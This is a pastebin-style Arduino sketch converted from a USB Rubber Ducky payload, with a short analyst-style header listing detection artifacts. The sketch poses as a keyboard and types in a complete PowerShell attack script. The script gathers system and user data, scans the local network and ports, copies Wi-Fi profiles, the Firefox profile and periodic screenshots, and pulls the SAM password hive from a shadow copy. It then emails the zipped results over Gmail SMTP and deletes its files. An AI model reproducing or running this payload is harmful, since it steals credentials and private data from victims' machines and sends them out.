
Untitled

a guest
Jun 30th, 2016
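/* Converted by Duckuino:
 * https://forums.hak5.org/index.php?/topic/32719-payload-converter-duckuino-duckyscript-to-arduino/?p=244590
 * Enjoy!
 *
 * Analyst summary, taken from the keystrokes in setup() below:
 * - The board enumerates as a USB keyboard, opens the Run dialog, starts Notepad elevated
 *   through PowerShell (`Start-Process notepad -Verb runAs`), types a PowerShell script
 *   into it and saves it as C:\Windows\config-6fee6.ps1. It then opens an elevated cmd window.
 * - The typed script builds an HTML inventory (WMI queries for OS, hardware, user account,
 *   shares, installed programs and updates), ping-sweeps the local /24, tests a fixed list
 *   of TCP ports, copies the Wlansvc profile directory and a Firefox profile directory,
 *   takes periodic screenshots, and copies the SAM hive out of a new volume shadow copy.
 * - It zips the results to C:\Windows\Report.zip, mails the archive over SMTP
 *   (smtp.gmail.com, port 587) and then deletes its working files.
 * Host artifacts visible in the script, useful for detection and triage: a
 * "Ducky Report <timestamp>" folder under the user profile, the C:\shadowcopy link,
 * C:\Windows\Report.zip, C:\Windows\config-6fee6.ps1, a Win32_ShadowCopy Create call from
 * PowerShell, and an outbound SMTP session on port 587 from a PowerShell process.
 */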
  5. void setup() {
  6. Keyboard.begin();
  7. delay(750);
  8.  
  9. type(KEY_LEFT_GUI,false);
  10. type('r',false);
  11. Keyboard.releaseAll();
  12. delay(750);
  13.  
  14. print(F("powershell Start-Process notepad -Verb runAs"));
  15.  
  16. type(KEY_RETURN,false);
  17. Keyboard.releaseAll();
  18. delay(750);
  19.  
  20. type(KEY_LEFT_ALT,false);
  21. type('y',false);
  22. Keyboard.releaseAll();
  23. delay(750);
  24.  
  25. type(KEY_RETURN,false);
  26. Keyboard.releaseAll();
  27.  
  28. type(KEY_LEFT_ALT,false);
  29. Keyboard.releaseAll();
  30. delay(750);
  31.  
  32. print(F("m"));
  33. delay(750);
  34. for(int i = 0; i < 51; i++) {
  35.  
  36. type(KEY_DOWN_ARROW,false);
  37. Keyboard.releaseAll();
  38. }
  39.  
  40. type(KEY_RETURN,false);
  41. Keyboard.releaseAll();
  42.  
  43. print(F("$folderDateTime = (get-date).ToString('d-M-y HHmmss')"));
  44.  
  45. type(KEY_RETURN,false);
  46. Keyboard.releaseAll();
  47.  
  48. print(F("$userDir = (Get-ChildItem env:\\userprofile).value + '\\Ducky Report ' + $folderDateTime"));
  49.  
  50. type(KEY_RETURN,false);
  51. Keyboard.releaseAll();
  52.  
  53. print(F("$fileSaveDir = New-Item ($userDir) -ItemType Directory"));
  54.  
  55. type(KEY_RETURN,false);
  56. Keyboard.releaseAll();
  57.  
  58. print(F("$date = get-date"));
  59.  
  60. type(KEY_RETURN,false);
  61. Keyboard.releaseAll();
  62.  
  63. print(F("$style = \"<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>\""));
  64.  
  65. type(KEY_RETURN,false);
  66. Keyboard.releaseAll();
  67.  
  68. print(F("$Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html'"));
  69.  
  70. type(KEY_RETURN,false);
  71. Keyboard.releaseAll();
  72.  
  73. print(F("$Report = $Report +\"<div id=body><h1>Duck Tool Kit Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>\""));
  74.  
  75. type(KEY_RETURN,false);
  76. Keyboard.releaseAll();
  77.  
  78. print(F("$SysBootTime = Get-WmiObject Win32_OperatingSystem"));
  79.  
  80. type(KEY_RETURN,false);
  81. Keyboard.releaseAll();
  82.  
  83. print(F("$BootTime = $SysBootTime.ConvertToDateTime($SysBootTime.LastBootUpTime)| ConvertTo-Html datetime"));
  84.  
  85. type(KEY_RETURN,false);
  86. Keyboard.releaseAll();
  87.  
  88. print(F("$SysSerialNo = (Get-WmiObject -Class Win32_OperatingSystem -ComputerName $env:COMPUTERNAME)"));
  89.  
  90. type(KEY_RETURN,false);
  91. Keyboard.releaseAll();
  92.  
  93. print(F("$SerialNo = $SysSerialNo.SerialNumber"));
  94.  
  95. type(KEY_RETURN,false);
  96. Keyboard.releaseAll();
  97.  
  98. print(F("$SysInfo = Get-WmiObject -class Win32_ComputerSystem -namespace root/CIMV2 | Select Manufacturer,Model"));
  99.  
  100. type(KEY_RETURN,false);
  101. Keyboard.releaseAll();
  102.  
  103. print(F("$SysManufacturer = $SysInfo.Manufacturer"));
  104.  
  105. type(KEY_RETURN,false);
  106. Keyboard.releaseAll();
  107.  
  108. print(F("$SysModel = $SysInfo.Model"));
  109.  
  110. type(KEY_RETURN,false);
  111. Keyboard.releaseAll();
  112.  
  113. print(F("$OS = (Get-WmiObject Win32_OperatingSystem -computername $env:COMPUTERNAME ).caption"));
  114.  
  115. type(KEY_RETURN,false);
  116. Keyboard.releaseAll();
  117.  
  118. print(F("$disk = Get-WmiObject Win32_LogicalDisk -Filter \"DeviceID='C:'\""));
  119.  
  120. type(KEY_RETURN,false);
  121. Keyboard.releaseAll();
  122.  
  123. print(F("$HD = [math]::truncate($disk.Size / 1GB)"));
  124.  
  125. type(KEY_RETURN,false);
  126. Keyboard.releaseAll();
  127.  
  128. print(F("$FreeSpace = [math]::truncate($disk.FreeSpace / 1GB)"));
  129.  
  130. type(KEY_RETURN,false);
  131. Keyboard.releaseAll();
  132.  
  133. print(F("$SysRam = Get-WmiObject -Class Win32_OperatingSystem -computername $env:COMPUTERNAME | Select TotalVisibleMemorySize"));
  134.  
  135. type(KEY_RETURN,false);
  136. Keyboard.releaseAll();
  137.  
  138. print(F("$Ram = [Math]::Round($SysRam.TotalVisibleMemorySize/1024KB)"));
  139.  
  140. type(KEY_RETURN,false);
  141. Keyboard.releaseAll();
  142.  
  143. print(F("$SysCpu = Get-WmiObject Win32_Processor | Select Name"));
  144.  
  145. type(KEY_RETURN,false);
  146. Keyboard.releaseAll();
  147.  
  148. print(F("$Cpu = $SysCpu.Name"));
  149.  
  150. type(KEY_RETURN,false);
  151. Keyboard.releaseAll();
  152.  
  153. print(F("$HardSerial = Get-WMIObject Win32_BIOS -Computer $env:COMPUTERNAME | select SerialNumber"));
  154.  
  155. type(KEY_RETURN,false);
  156. Keyboard.releaseAll();
  157.  
  158. print(F("$HardSerialNo = $HardSerial.SerialNumber"));
  159.  
  160. type(KEY_RETURN,false);
  161. Keyboard.releaseAll();
  162.  
  163. print(F("$SysCdDrive = Get-WmiObject Win32_CDROMDrive |select Name"));
  164.  
  165. type(KEY_RETURN,false);
  166. Keyboard.releaseAll();
  167.  
  168. print(F("$graphicsCard = gwmi win32_VideoController |select Name"));
  169.  
  170. type(KEY_RETURN,false);
  171. Keyboard.releaseAll();
  172.  
  173. print(F("$graphics = $graphicsCard.Name"));
  174.  
  175. type(KEY_RETURN,false);
  176. Keyboard.releaseAll();
  177.  
  178. print(F("$SysCdDrive = Get-WmiObject Win32_CDROMDrive |select -first 1"));
  179.  
  180. type(KEY_RETURN,false);
  181. Keyboard.releaseAll();
  182.  
  183. print(F("$DriveLetter = $CDDrive.Drive"));
  184.  
  185. type(KEY_RETURN,false);
  186. Keyboard.releaseAll();
  187.  
  188. print(F("$DriveName = $CDDrive.Caption"));
  189.  
  190. type(KEY_RETURN,false);
  191. Keyboard.releaseAll();
  192.  
  193. print(F("$Disk = $DriveLetter + '' + $DriveName"));
  194.  
  195. type(KEY_RETURN,false);
  196. Keyboard.releaseAll();
  197.  
  198. print(F("$Firewall = New-Object -com HNetCfg.FwMgr"));
  199.  
  200. type(KEY_RETURN,false);
  201. Keyboard.releaseAll();
  202.  
  203. print(F("$FireProfile = $Firewall.LocalPolicy.CurrentProfile"));
  204.  
  205. type(KEY_RETURN,false);
  206. Keyboard.releaseAll();
  207.  
  208. print(F("$FireProfile = $FireProfile.FirewallEnabled"));
  209.  
  210. type(KEY_RETURN,false);
  211. Keyboard.releaseAll();
  212.  
  213. print(F("$Report = $Report + \"<div id=left><h3>Computer Information</h3><br><table><tr><td>Operating System</td><td>$OS</td></tr><tr><td>OS Serial Number:</td><td>$SerialNo</td></tr><tr><td>Current User:</td><td>$env:USERNAME </td></tr><tr><td>System Uptime:</td><td>$BootTime</td></tr><tr><td>System Manufacturer:</td><td>$SysManufacturer</td></tr><tr><td>System Model:</td><td>$SysModel</td></tr><tr><td>Serial Number:</td><td>$HardSerialNo</td></tr><tr><td>Firewall is Active:</td><td>$FireProfile</td></tr></table></div><div id=right><h3>Hardware Information</h3><table><tr><td>Hardrive Size:</td><td>$HD GB</td></tr><tr><td>Hardrive Free Space:</td><td>$FreeSpace GB</td></tr><tr><td>System RAM:</td><td>$Ram GB</td></tr><tr><td>Processor:</td><td>$Cpu</td></tr><td>CD Drive:</td><td>$Disk</td></tr><tr><td>Graphics Card:</td><td>$graphics</td></tr></table></div>\""));
  214.  
  215. type(KEY_RETURN,false);
  216. Keyboard.releaseAll();
  217.  
  218. print(F("$UserInfo = Get-WmiObject -class Win32_UserAccount -namespace root/CIMV2 | Where-Object {$_.Name -eq $env:UserName}| Select AccountType,SID,PasswordRequired"));
  219.  
  220. type(KEY_RETURN,false);
  221. Keyboard.releaseAll();
  222.  
  223. print(F("$UserType = $UserInfo.AccountType"));
  224.  
  225. type(KEY_RETURN,false);
  226. Keyboard.releaseAll();
  227.  
  228. print(F("$UserSid = $UserInfo.SID"));
  229.  
  230. type(KEY_RETURN,false);
  231. Keyboard.releaseAll();
  232.  
  233. print(F("$UserPass = $UserInfo.PasswordRequired"));
  234.  
  235. type(KEY_RETURN,false);
  236. Keyboard.releaseAll();
  237.  
  238. print(F("$IsAdmin = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] 'Administrator')"));
  239.  
  240. type(KEY_RETURN,false);
  241. Keyboard.releaseAll();
  242.  
  243. print(F("$Report = $Report +\"<div id=left><h3>User Information</h3><br><table><tr><td>Current User Name:</td><td>$env:USERNAME</td></tr><tr><td>Account Type:</td><td> $UserType</td></tr><tr><td>User SID:</td><td>$UserSid</td></tr><tr><td>Account Domain:</td><td>$env:USERDOMAIN</td></tr><tr><td>Password Required:</td><td>$UserPass</td></tr><tr><td>Current User is Admin:</td><td>$IsAdmin</td></tr></table>\""));
  244.  
  245. type(KEY_RETURN,false);
  246. Keyboard.releaseAll();
  247.  
  248. print(F("$Report = $Report + '</div>'"));
  249.  
  250. type(KEY_RETURN,false);
  251. Keyboard.releaseAll();
  252.  
  253. print(F(" $u = 0"));
  254.  
  255. type(KEY_RETURN,false);
  256. Keyboard.releaseAll();
  257.  
  258. print(F("$allUsb = @(get-wmiobject win32_volume | select Name, Label, FreeSpace)"));
  259.  
  260. type(KEY_RETURN,false);
  261. Keyboard.releaseAll();
  262.  
  263. print(F("$Report = $Report + '<div id=right><h3>USB Devices</h3><table>'"));
  264.  
  265. type(KEY_RETURN,false);
  266. Keyboard.releaseAll();
  267.  
  268. print(F("do {"));
  269.  
  270. type(KEY_RETURN,false);
  271. Keyboard.releaseAll();
  272.  
  273. print(F("$gbUSB = [math]::truncate($allUsb[$u].FreeSpace / 1GB)"));
  274.  
  275. type(KEY_RETURN,false);
  276. Keyboard.releaseAll();
  277.  
  278. print(F("$Report = $Report + \"<tr><td>Drive Name: </td><td> + \" $allUsb[$u].Name + $allUsb[$u].Label + \"</td><td>Free Space: </td><td>\" + $gbUSB + \"GB</td></tr>STRING Write-Output $fullUSB\""));
  279.  
  280. type(KEY_RETURN,false);
  281. Keyboard.releaseAll();
  282.  
  283. print(F("$u ++"));
  284.  
  285. type(KEY_RETURN,false);
  286. Keyboard.releaseAll();
  287.  
  288. print(F("} while ($u -lt $allUsb.Count)"));
  289.  
  290. type(KEY_RETURN,false);
  291. Keyboard.releaseAll();
  292.  
  293. print(F("$Report = $Report + '</table></div>'"));
  294.  
  295. type(KEY_RETURN,false);
  296. Keyboard.releaseAll();
  297.  
  298. print(F("$Report = $Report + '<div id=left><h3>Shared Drives/Devices</h3>'"));
  299.  
  300. type(KEY_RETURN,false);
  301. Keyboard.releaseAll();
  302.  
  303. print(F("$Report = $Report + (GET-WMIOBJECT Win32_Share | convertto-html Name, Description, Path)"));
  304.  
  305. type(KEY_RETURN,false);
  306. Keyboard.releaseAll();
  307.  
  308. print(F("$Report = $Report + '</div>'"));
  309.  
  310. type(KEY_RETURN,false);
  311. Keyboard.releaseAll();
  312.  
  313. print(F("$Report = $Report + '<div id=center><h3> Installed Programs</h3> '"));
  314.  
  315. type(KEY_RETURN,false);
  316. Keyboard.releaseAll();
  317.  
  318. print(F("$Report = $Report + (Get-WmiObject -class Win32_Product | ConvertTo-html Name, Version,InstallDate)"));
  319.  
  320. type(KEY_RETURN,false);
  321. Keyboard.releaseAll();
  322.  
  323. print(F("$Report = $Report + '</table></div>'"));
  324.  
  325. type(KEY_RETURN,false);
  326. Keyboard.releaseAll();
  327.  
  328. print(F("$Report = $Report + '<div id=center><h3> Installed Updates</h3>'"));
  329.  
  330. type(KEY_RETURN,false);
  331. Keyboard.releaseAll();
  332.  
  333. print(F("$Report = $Report + (Get-WmiObject Win32_QuickFixEngineering -ComputerName $env:COMPUTERNAME | sort-object -property installedon -Descending | ConvertTo-Html Description, HotFixId,Installedon,InstalledBy)"));
  334.  
  335. type(KEY_RETURN,false);
  336. Keyboard.releaseAll();
  337.  
  338. print(F("$Report = $Report + '</div>'"));
  339.  
  340. type(KEY_RETURN,false);
  341. Keyboard.releaseAll();
  342.  
  343. print(F("$Report = $Report + '<div id=center><h3>User Documents (doc,docx,pdf,rar)</h3>'"));
  344.  
  345. type(KEY_RETURN,false);
  346. Keyboard.releaseAll();
  347.  
  348. print(F("$Report = $Report + (Get-ChildItem -Path $userDir -Include *.doc, *.docx, *.pdf, *.zip, *.rar -Recurse |convertto-html Directory, Name, LastAccessTime)"));
  349.  
  350. type(KEY_RETURN,false);
  351. Keyboard.releaseAll();
  352.  
  353. print(F("$Report = $Report + '</div>'"));
  354.  
  355. type(KEY_RETURN,false);
  356. Keyboard.releaseAll();
  357.  
  358. print(F("$Report = $Report + '<div id=center><h3>Network Information</h3>'"));
  359.  
  360. type(KEY_RETURN,false);
  361. Keyboard.releaseAll();
  362.  
  363. print(F("$Report = $Report + (Get-WmiObject Win32_NetworkAdapterConfiguration -filter 'IPEnabled= True' | Select Description,DNSHostname, @{Name='IP Address ';Expression={$_.IPAddress}}, MACAddress | ConvertTo-Html)"));
  364.  
  365. type(KEY_RETURN,false);
  366. Keyboard.releaseAll();
  367.  
  368. print(F("$Report = $Report + '</table></div>'"));
  369.  
  370. type(KEY_RETURN,false);
  371. Keyboard.releaseAll();
  372.  
  373. print(F("$IP = Get-WmiObject Win32_NetworkAdapterConfiguration -Filter 'IPEnabled = True' | Select IPAddress -First 1"));
  374.  
  375. type(KEY_RETURN,false);
  376. Keyboard.releaseAll();
  377.  
  378. print(F("$IPAddr = $IP.IPAddress | Select-Object -Index 0"));
  379.  
  380. type(KEY_RETURN,false);
  381. Keyboard.releaseAll();
  382.  
  383. print(F("$IPAddr -as [String]"));
  384.  
  385. type(KEY_RETURN,false);
  386. Keyboard.releaseAll();
  387.  
  388. print(F("$IPa = $IPAddr.Split('.') | Select -Index 0"));
  389.  
  390. type(KEY_RETURN,false);
  391. Keyboard.releaseAll();
  392.  
  393. print(F("$IPb = $IPAddr.Split('.') | Select -Index 1"));
  394.  
  395. type(KEY_RETURN,false);
  396. Keyboard.releaseAll();
  397.  
  398. print(F("$IPc = $IPAddr.Split('.') | Select -Index 2"));
  399.  
  400. type(KEY_RETURN,false);
  401. Keyboard.releaseAll();
  402.  
  403. print(F("$IPAddr = $IPa + '.' + $IPb + '.' + $IPc + '.'"));
  404.  
  405. type(KEY_RETURN,false);
  406. Keyboard.releaseAll();
  407.  
  408. print(F("$Ping = new-object System.Net.Networkinformation.Ping"));
  409.  
  410. type(KEY_RETURN,false);
  411. Keyboard.releaseAll();
  412.  
  413. print(F("$ScanResults = 1..255| ForEach-Object {($Ping).Send($IpAddr + $_) } | Where-Object {$_.Status -eq 'Success'} | select Address"));
  414.  
  415. type(KEY_RETURN,false);
  416. Keyboard.releaseAll();
  417.  
  418. print(F("$x = 0"));
  419.  
  420. type(KEY_RETURN,false);
  421. Keyboard.releaseAll();
  422.  
  423. print(F("$Report = $Report + '<div id=center><h3>Network Scan Results</h3><table>'"));
  424.  
  425. type(KEY_RETURN,false);
  426. Keyboard.releaseAll();
  427.  
  428. print(F("do {"));
  429.  
  430. type(KEY_RETURN,false);
  431. Keyboard.releaseAll();
  432.  
  433. print(F("$IPResults = $ScanResults | Select-Object -Index $x"));
  434.  
  435. type(KEY_RETURN,false);
  436. Keyboard.releaseAll();
  437.  
  438. print(F("$CompInfo = Get-WmiObject Win32_OperatingSystem -Computer $IPResults.Address | Select RegisteredUser, SystemDirectory"));
  439.  
  440. type(KEY_RETURN,false);
  441. Keyboard.releaseAll();
  442.  
  443. print(F("$CompName = (Get-WmiObject Win32_OperatingSystem -Computer $IPResults.Address).csname"));
  444.  
  445. type(KEY_RETURN,false);
  446. Keyboard.releaseAll();
  447.  
  448. print(F("$CurrIP = $IPResults.Address.IPAddressToString"));
  449.  
  450. type(KEY_RETURN,false);
  451. Keyboard.releaseAll();
  452.  
  453. print(F("$CurrOS = $CompInfo.SystemDirectory"));
  454.  
  455. type(KEY_RETURN,false);
  456. Keyboard.releaseAll();
  457.  
  458. print(F("$CurrName = $CompInfo.RegisteredUser"));
  459.  
  460. type(KEY_RETURN,false);
  461. Keyboard.releaseAll();
  462.  
  463. print(F("if ($CompInfo -ne $null){"));
  464.  
  465. type(KEY_RETURN,false);
  466. Keyboard.releaseAll();
  467.  
  468. print(F("$Report = $Report + '<tr><td><b>IP Address:</b></td><td>' + $CurrIP + '</td><td><b>Compter Name: </b></td><td>' + $CompName + '</td><td><b>User Name: </b></td><td>' + $CurrName + '</td> <td><b>OS:</b> </td><td>' + $CurrOS + '</td></tr><br>'"));
  469.  
  470. type(KEY_RETURN,false);
  471. Keyboard.releaseAll();
  472.  
  473. print(F("}else{"));
  474.  
  475. type(KEY_RETURN,false);
  476. Keyboard.releaseAll();
  477.  
  478. print(F("$Report = $Report + '<tr><td><b>IP Address: </b></td><td>' + $CurrIP + '</td><td><b>Computer Name: </b></td><td>NOT KNOWN</td><td><b>User Name: </b></td><td>NOT KNOWN</td><td><b>OS:</b></td><td>NOT KNOWN</td></tr><br>'}"));
  479.  
  480. type(KEY_RETURN,false);
  481. Keyboard.releaseAll();
  482.  
  483. print(F("$x ++"));
  484.  
  485. type(KEY_RETURN,false);
  486. Keyboard.releaseAll();
  487.  
  488. print(F("} while ($x -lt $ScanResults.Count)"));
  489.  
  490. type(KEY_RETURN,false);
  491. Keyboard.releaseAll();
  492.  
  493. print(F("$Report = $Report + '</table></div>'"));
  494.  
  495. type(KEY_RETURN,false);
  496. Keyboard.releaseAll();
  497.  
  498. print(F("$Computer = $env:COMPUTERNAME"));
  499.  
  500. type(KEY_RETURN,false);
  501. Keyboard.releaseAll();
  502.  
  503. print(F("$PortList = 0, 21, 22, 23, 25, 79, 80, 110, 113, 119, 135, 137, 139, 143, 389, 443, 445, 1002, 1024, 1030, 1720, 1900, 5000, 8080"));
  504.  
  505. type(KEY_RETURN,false);
  506. Keyboard.releaseAll();
  507.  
  508. print(F("$Report = $Report + '<div id=right><h3>Port Scan of ' + $Computer + '</h3><table>'"));
  509.  
  510. type(KEY_RETURN,false);
  511. Keyboard.releaseAll();
  512.  
  513. print(F("foreach ($PortNumber in $PortList) {"));
  514.  
  515. type(KEY_RETURN,false);
  516. Keyboard.releaseAll();
  517.  
  518. print(F("$PortCheck = New-Object Net.Sockets.TcpClient"));
  519.  
  520. type(KEY_RETURN,false);
  521. Keyboard.releaseAll();
  522.  
  523. print(F("$PortCheck.Connect($Computer, $PortNumber)"));
  524.  
  525. type(KEY_RETURN,false);
  526. Keyboard.releaseAll();
  527.  
  528. print(F("if ($PortCheck.Connected) {"));
  529.  
  530. type(KEY_RETURN,false);
  531. Keyboard.releaseAll();
  532.  
  533. print(F("$Report = $Report + '<tr><td><b><font color=red>Port ' + $PortNumber + ' is open</font></b></td></tr>'}"));
  534.  
  535. type(KEY_RETURN,false);
  536. Keyboard.releaseAll();
  537.  
  538. print(F("else {$Report = $Report + '<tr><td>Port ' + $PortNumber + ' is closed</td></tr>'}}"));
  539.  
  540. type(KEY_RETURN,false);
  541. Keyboard.releaseAll();
  542.  
  543. print(F("$Report = $Report + '</table></div>'"));
  544.  
  545. type(KEY_RETURN,false);
  546. Keyboard.releaseAll();
  547.  
  548. print(F("$wlanSaveDir = New-Item $userDir'/Duck/WLAN_PROFILES' -ItemType Directory"));
  549.  
  550. type(KEY_RETURN,false);
  551. Keyboard.releaseAll();
  552.  
  553. print(F("$srcDir = 'C:/ProgramData/Microsoft/Wlansvc/Profiles/Interfaces'"));
  554.  
  555. type(KEY_RETURN,false);
  556. Keyboard.releaseAll();
  557.  
  558. print(F("Copy-Item $srcDir $wlanSaveDir -Recurse"));
  559.  
  560. type(KEY_RETURN,false);
  561. Keyboard.releaseAll();
  562.  
  563. print(F("$jpegSaveDir = New-Item $fileSaveDir'/Screenshots' -ItemType Directory"));
  564.  
  565. type(KEY_RETURN,false);
  566. Keyboard.releaseAll();
  567.  
  568. print(F("$displayInfo = Get-WmiObject Win32_DesktopMonitor | Where {$_.Name -eq 'Default Monitor'}| Select ScreenHeight, ScreenWidth"));
  569.  
  570. type(KEY_RETURN,false);
  571. Keyboard.releaseAll();
  572.  
  573. print(F("$displayWidth = $displayInfo.ScreenWidth"));
  574.  
  575. type(KEY_RETURN,false);
  576. Keyboard.releaseAll();
  577.  
  578. print(F("$displayHeight = $displayInfo.ScreenHeight"));
  579.  
  580. type(KEY_RETURN,false);
  581. Keyboard.releaseAll();
  582.  
  583. print(F("[System.Reflection.Assembly]::LoadWithPartialName(\"System.Drawing\")"));
  584.  
  585. type(KEY_RETURN,false);
  586. Keyboard.releaseAll();
  587.  
  588. print(F("$x = 0"));
  589.  
  590. type(KEY_RETURN,false);
  591. Keyboard.releaseAll();
  592.  
  593. print(F("do { Start-Sleep -Seconds 60"));
  594.  
  595. type(KEY_RETURN,false);
  596. Keyboard.releaseAll();
  597.  
  598. print(F("$jpegName = (get-date).ToString('HHmmss')"));
  599.  
  600. type(KEY_RETURN,false);
  601. Keyboard.releaseAll();
  602.  
  603. print(F("$image = new-object System.Drawing.Bitmap 1366 ,768"));
  604.  
  605. type(KEY_RETURN,false);
  606. Keyboard.releaseAll();
  607.  
  608. print(F("$imageSize = New-object System.Drawing.Size $displayWidth,$displayHeight"));
  609.  
  610. type(KEY_RETURN,false);
  611. Keyboard.releaseAll();
  612.  
  613. print(F("$screen = [System.Drawing.Graphics]::FromImage($image)"));
  614.  
  615. type(KEY_RETURN,false);
  616. Keyboard.releaseAll();
  617.  
  618. print(F("$screen.copyfromscreen(0,0,0,0, $imageSize,([System.Drawing.CopyPixelOperation]::SourceCopy))"));
  619.  
  620. type(KEY_RETURN,false);
  621. Keyboard.releaseAll();
  622.  
  623. print(F("$image.Save(\"$jpegSaveDir/$jpegName.jpeg\",([system.drawing.imaging.imageformat]::jpeg));"));
  624.  
  625. type(KEY_RETURN,false);
  626. Keyboard.releaseAll();
  627.  
  628. print(F("$x++ } while ($x -ne 60);"));
  629.  
  630. type(KEY_RETURN,false);
  631. Keyboard.releaseAll();
  632.  
  633. print(F(" $fireSaveDir = New-Item $userDir'\\Duck\\FireFox-Profile' -ItemType Directory"));
  634.  
  635. type(KEY_RETURN,false);
  636. Keyboard.releaseAll();
  637.  
  638. print(F("$fireDir = $userDir + '\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles'"));
  639.  
  640. type(KEY_RETURN,false);
  641. Keyboard.releaseAll();
  642.  
  643. print(F("$getFire = Get-Item -Path $fireDir -Exclude extensions"));
  644.  
  645. type(KEY_RETURN,false);
  646. Keyboard.releaseAll();
  647.  
  648. print(F("Copy-Item $getFire $fireSaveDir -Recurse"));
  649.  
  650. type(KEY_RETURN,false);
  651. Keyboard.releaseAll();
  652.  
  653. print(F("Start-Sleep -s 10"));
  654.  
  655. type(KEY_RETURN,false);
  656. Keyboard.releaseAll();
  657.  
  658. print(F("$createShadow = (gwmi -List Win32_ShadowCopy).Create('C:\\', 'ClientAccessible')"));
  659.  
  660. type(KEY_RETURN,false);
  661. Keyboard.releaseAll();
  662.  
  663. print(F("$shadow = gwmi Win32_ShadowCopy | ? { $_.ID -eq $createShadow.ShadowID }"));
  664.  
  665. type(KEY_RETURN,false);
  666. Keyboard.releaseAll();
  667.  
  668. print(F("$addSlash = $shadow.DeviceObject + ''"));
  669.  
  670. type(KEY_RETURN,false);
  671. Keyboard.releaseAll();
  672.  
  673. print(F("cmd /c mklink C:\\shadowcopy $addSlash"));
  674.  
  675. type(KEY_RETURN,false);
  676. Keyboard.releaseAll();
  677.  
  678. print(F("Copy-Item 'C:\\shadowcopy\\Windows\\System32\\config\\SAM' $fileSaveDir"));
  679.  
  680. type(KEY_RETURN,false);
  681. Keyboard.releaseAll();
  682.  
  683. print(F("Remove-Item -recurse -force 'C:\\shadowcopy'"));
  684.  
  685. type(KEY_RETURN,false);
  686. Keyboard.releaseAll();
  687.  
  688. print(F("$Report >> $fileSaveDir'/ComputerInfo.html'"));
  689.  
  690. type(KEY_RETURN,false);
  691. Keyboard.releaseAll();
  692.  
  693. print(F("function copy-ToZip($fileSaveDir){"));
  694.  
  695. type(KEY_RETURN,false);
  696. Keyboard.releaseAll();
  697.  
  698. print(F("$srcdir = $fileSaveDir"));
  699.  
  700. type(KEY_RETURN,false);
  701. Keyboard.releaseAll();
  702.  
  703. print(F("$zipFile = 'C:\\Windows\\Report.zip'"));
  704.  
  705. type(KEY_RETURN,false);
  706. Keyboard.releaseAll();
  707.  
  708. print(F("if(-not (test-path($zipFile))) {"));
  709.  
  710. type(KEY_RETURN,false);
  711. Keyboard.releaseAll();
  712.  
  713. print(F("set-content $zipFile (\"PK\" + [char]5 + [char]6 + (\"$([char]0)\" * 18))"));
  714.  
  715. type(KEY_RETURN,false);
  716. Keyboard.releaseAll();
  717.  
  718. print(F("(dir $zipFile).IsReadOnly = $false}"));
  719.  
  720. type(KEY_RETURN,false);
  721. Keyboard.releaseAll();
  722.  
  723. print(F("$shellApplication = new-object -com shell.application"));
  724.  
  725. type(KEY_RETURN,false);
  726. Keyboard.releaseAll();
  727.  
  728. print(F("$zipPackage = $shellApplication.NameSpace($zipFile)"));
  729.  
  730. type(KEY_RETURN,false);
  731. Keyboard.releaseAll();
  732.  
  733. print(F("$files = Get-ChildItem -Path $srcdir"));
  734.  
  735. type(KEY_RETURN,false);
  736. Keyboard.releaseAll();
  737.  
  738. print(F("foreach($file in $files) {"));
  739.  
  740. type(KEY_RETURN,false);
  741. Keyboard.releaseAll();
  742.  
  743. print(F("$zipPackage.CopyHere($file.FullName)"));
  744.  
  745. type(KEY_RETURN,false);
  746. Keyboard.releaseAll();
  747.  
  748. print(F("while($zipPackage.Items().Item($file.name) -eq $null){"));
  749.  
  750. type(KEY_RETURN,false);
  751. Keyboard.releaseAll();
  752.  
  753. print(F("Start-sleep -seconds 1 }}}"));
  754.  
  755. type(KEY_RETURN,false);
  756. Keyboard.releaseAll();
  757.  
  758. print(F("copy-ToZip($fileSaveDir)"));
  759.  
  760. type(KEY_RETURN,false);
  761. Keyboard.releaseAll();
  762.  
  763. print(F("$SMTPServer = 'smtp.gmail.com'"));
  764.  
  765. type(KEY_RETURN,false);
  766. Keyboard.releaseAll();
  767.  
  768. print(F("$SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)"));
  769.  
  770. type(KEY_RETURN,false);
  771. Keyboard.releaseAll();
  772.  
  773. print(F("$SMTPInfo.EnableSsl = $true"));
  774.  
  775. type(KEY_RETURN,false);
  776. Keyboard.releaseAll();
  777.  
  778. print(F("$SMTPInfo.Credentials = New-Object System.Net.NetworkCredential'mail', 'psswd');"));
  779.  
  780. type(KEY_RETURN,false);
  781. Keyboard.releaseAll();
  782.  
  783. print(F("$ReportEmail = New-Object System.Net.Mail.MailMessage"));
  784.  
  785. type(KEY_RETURN,false);
  786. Keyboard.releaseAll();
  787.  
  788. print(F("$ReportEmail.From = 'tim241@ziggo.nl'"));
  789.  
  790. type(KEY_RETURN,false);
  791. Keyboard.releaseAll();
  792.  
  793. print(F("$ReportEmail.To.Add('tim241@ziggo.nl')"));
  794.  
  795. type(KEY_RETURN,false);
  796. Keyboard.releaseAll();
  797.  
  798. print(F("$ReportEmail.Subject = 'Duck Toolkit Recon Report'"));
  799.  
  800. type(KEY_RETURN,false);
  801. Keyboard.releaseAll();
  802.  
  803. print(F("$ReportEmail.Body = 'Please find attached your reconnaissance report.'"));
  804.  
  805. type(KEY_RETURN,false);
  806. Keyboard.releaseAll();
  807.  
  808. print(F("$ReportEmail.Attachments.Add('C:\\Windows\\Report.zip')"));
  809.  
  810. type(KEY_RETURN,false);
  811. Keyboard.releaseAll();
  812.  
  813. print(F("$SMTPInfo.Send($ReportEmail)"));
  814.  
  815. type(KEY_RETURN,false);
  816. Keyboard.releaseAll();
  817.  
  818. print(F("remove-item $fileSaveDir -recurse"));
  819.  
  820. type(KEY_RETURN,false);
  821. Keyboard.releaseAll();
  822.  
  823. print(F("remove-item 'C:\\Windows\\Report.zip'"));
